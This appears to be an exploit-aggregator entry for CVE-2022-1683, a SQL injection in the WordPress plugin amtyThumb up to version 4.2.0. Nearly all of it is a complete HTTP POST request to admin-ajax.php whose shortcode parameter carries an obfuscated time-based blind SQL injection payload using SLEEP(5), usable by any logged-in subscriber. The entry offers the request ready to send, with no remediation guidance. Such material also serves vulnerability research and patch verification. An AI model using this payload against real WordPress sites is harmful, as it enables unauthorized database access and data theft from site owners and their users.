Exploit for amtyThumb <= 4.2.0 - Subscriber+ SQLi CVE-2022-1683

Name: Exploit for amtyThumb <= 4.2.0 - Subscriber+ SQLi CVE-2022-1683
Rating: 5 (62 reviews)

2022-05-09 | CVSS 6.5

## https://sploitus.com/exploit?id=WPEX-ID:359D145B-C365-4E7C-A12E-C26B7B8617CE
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 168
Connection: close
Cookie: [any authenticated user]

action=parse-media-shortcode&shortcode=%5bamtyThumbOnly%20percent%3d50%20post_id%3d1%2f**%2fAND%2f**%2f(SELECT%2f**%2f7741%2f**%2fFROM%2f**%2f(SELECT(SLEEP(5)))hlAf)%5d